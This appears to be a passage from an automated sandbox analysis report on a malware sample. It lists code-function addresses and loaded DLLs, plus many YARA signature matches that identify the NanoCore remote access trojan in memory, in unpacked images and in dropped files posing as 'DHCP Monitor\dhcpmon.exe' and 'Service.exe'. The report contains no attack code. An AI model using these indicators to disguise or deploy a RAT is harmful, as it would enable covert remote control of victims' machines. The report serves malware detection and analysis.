          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe Code function: 0_2_01334AA9
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe Code function: 0_2_0131FA88
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe Code function: 0_2_0133CD20
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe Code function: 0_2_01325DA7
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe Code function: 0_2_01330CA3
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe Code function: 0_2_0131BF33
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe Code function: 0_2_0132FF5A
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe Code function: 0_2_0131DF8C
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe Code function: 0_2_01313FDE
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe Code function: 0_2_0131EE34
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe Code function: 0_2_01315E9C
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe Code function: 0_2_01323E9D
          Source: C:\Users\user\Desktop\Main.exe Code function: 1_2_0000000140013021
          Source: C:\Users\user\Desktop\Main.exe Code function: 1_2_0000000140013507
          Source: C:\Users\user\Desktop\Main.exe Code function: 1_2_0000000140010210
          Source: C:\Users\user\Desktop\Main.exe Code function: 1_2_0000000140015220
          Source: C:\Users\user\Desktop\Main.exe Code function: 1_2_000000014000EA48
          Source: C:\Users\user\Desktop\Main.exe Code function: 1_2_0000000140014E80
          Source: C:\Users\user\Desktop\Main.exe Code function: 1_2_0000000140014E90
          Source: C:\Users\user\Desktop\Main.exe Code function: 1_2_0000000140012E97
          Source: C:\Users\user\Desktop\Main.exe Code function: 1_2_0000000140015F30
          Source: C:\Users\user\Desktop\Main.exe Code function: 1_2_000000014000B758
          Source: C:\Users\user\Desktop\Main.exe Code function: 1_2_0000000140013798
          Source: C:\Users\user\Desktop\Service.exe Code function: 2_2_0090524A
          Source: C:\Users\user\Desktop\Service.exe Code function: 2_2_00F12477
          Source: C:\Users\user\Desktop\Service.exe Code function: 2_2_00F27AC1
          Source: C:\Users\user\Desktop\Service.exe Code function: 2_2_00F27FA7
          Source: C:\Users\user\Desktop\Service.exe Code function: 2_2_01453850
          Source: C:\Users\user\Desktop\Service.exe Code function: 2_2_0145B058
          Source: C:\Users\user\Desktop\Service.exe Code function: 2_2_01458788
          Source: C:\Users\user\Desktop\Service.exe Code function: 2_2_014523A0
          Source: C:\Users\user\Desktop\Service.exe Code function: 2_2_01452FA8
          Source: C:\Users\user\Desktop\Service.exe Code function: 2_2_0145944F
          Source: C:\Users\user\Desktop\Service.exe Code function: 2_2_0145306F
          Source: C:\Users\user\Desktop\Service.exe Code function: 2_2_01459C30
          Source: C:\Users\user\Desktop\Service.exe Code function: 2_2_01459388
          Source: C:\Users\user\Desktop\Service.exe Code function: 2_2_0145969B
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 16_2_00C6524A
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 16_2_02F023A0
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 16_2_02F02FA8
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 16_2_02F03850
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 16_2_02F0306F
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe Code function: String function: 0132EE60 appears 31 times
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe Code function: String function: 0132E3CC appears 35 times
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe Code function: String function: 0132E4A0 appears 53 times
          Source: 01d32b29_by_Libranalysis.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 01d32b29_by_Libranalysis.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 01d32b29_by_Libranalysis.exe, 00000000.00000002.335209581.0000000007AA0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameSHELL32.DLL.MUIj% vs 01d32b29_by_Libranalysis.exe
          Source: 01d32b29_by_Libranalysis.exe, 00000000.00000002.334483521.0000000007940000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs 01d32b29_by_Libranalysis.exe
          Source: 01d32b29_by_Libranalysis.exe, 00000000.00000002.335147370.0000000007A60000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameWindows.Storage.dll.MUIj% vs 01d32b29_by_Libranalysis.exe
          Source: 01d32b29_by_Libranalysis.exe, 00000000.00000002.335076587.0000000007A40000.00000002.00000001.sdmp Binary or memory string: originalfilename vs 01d32b29_by_Libranalysis.exe
          Source: 01d32b29_by_Libranalysis.exe, 00000000.00000002.335076587.0000000007A40000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs 01d32b29_by_Libranalysis.exe
          Source: 01d32b29_by_Libranalysis.exe, 00000000.00000002.333359295.0000000003AF0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameuser32j% vs 01d32b29_by_Libranalysis.exe
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe Section loaded: api-ms-win-core-synch-l1-2-0.dll
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe Section loaded: api-ms-win-core-fibers-l1-1-1.dll
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe Section loaded: api-ms-win-core-synch-l1-2-0.dll
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe Section loaded: api-ms-win-core-fibers-l1-1-1.dll
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe Section loaded: api-ms-win-core-localization-l1-2-1.dll
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe Section loaded: dxgidebug.dll
          Source: 01d32b29_by_Libranalysis.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe Reg.exe query 'HKU\S-1-5-19\Environment'
          Source: 00000010.00000002.377390680.0000000004421000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 00000002.00000000.332243003.0000000000902000.00000002.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000002.00000000.332243003.0000000000902000.00000002.00020000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 00000002.00000002.604957919.0000000005840000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000002.00000002.604957919.0000000005840000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000002.00000002.597461394.0000000000902000.00000002.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000002.00000002.597461394.0000000000902000.00000002.00020000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 00000002.00000002.603266642.00000000041BA000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 00000002.00000002.604469931.0000000005310000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000002.00000002.604469931.0000000005310000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000010.00000002.377356574.0000000003421000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 00000010.00000002.376298581.0000000000C62000.00000002.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000010.00000002.376298581.0000000000C62000.00000002.00020000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 00000010.00000000.357721819.0000000000C62000.00000002.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000010.00000000.357721819.0000000000C62000.00000002.00020000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: Process Memory Space: Service.exe PID: 6520, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: Process Memory Space: Service.exe PID: 6520, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: Process Memory Space: dhcpmon.exe PID: 7056, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: Process Memory Space: dhcpmon.exe PID: 7056, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: C:\Users\user\Desktop\Service.exe, type: DROPPED Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: C:\Users\user\Desktop\Service.exe, type: DROPPED Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: C:\Users\user\Desktop\Service.exe, type: DROPPED Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 2.2.Service.exe.5310000.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 2.2.Service.exe.5310000.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 2.2.Service.exe.41d2a15.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 2.2.Service.exe.41d2a15.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 16.0.dhcpmon.exe.c60000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 16.0.dhcpmon.exe.c60000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 16.0.dhcpmon.exe.c60000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 2.2.Service.exe.5844629.10.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 2.2.Service.exe.5844629.10.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 2.2.Service.exe.41ce3ec.4.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 2.2.Service.exe.41ce3ec.4.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 2.0.Service.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 2.0.Service.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 2.0.Service.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 2.2.Service.exe.41ce3ec.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 2.2.Service.exe.41ce3ec.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 16.2.dhcpmon.exe.c60000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 16.2.dhcpmon.exe.c60000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 16.2.dhcpmon.exe.c60000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 16.2.dhcpmon.exe.4472a15.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 16.2.dhcpmon.exe.4472a15.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 2.2.Service.exe.5840000.9.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 2.2.Service.exe.5840000.9.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 16.2.dhcpmon.exe.44695b6.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 16.2.dhcpmon.exe.44695b6.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 16.2.dhcpmon.exe.44695b6.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 16.2.dhcpmon.exe.3443dc4.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 16.2.dhcpmon.exe.3443dc4.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 2.2.Service.exe.3191770.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 2.2.Service.exe.3191770.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 16.2.dhcpmon.exe.446e3ec.5.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 16.2.dhcpmon.exe.446e3ec.5.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 2.2.Service.exe.5840000.9.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 2.2.Service.exe.5840000.9.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 2.2.Service.exe.41c95b6.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 2.2.Service.exe.41c95b6.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 2.2.Service.exe.41c95b6.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 2.2.Service.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 2.2.Service.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 2.2.Service.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 16.2.dhcpmon.exe.446e3ec.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
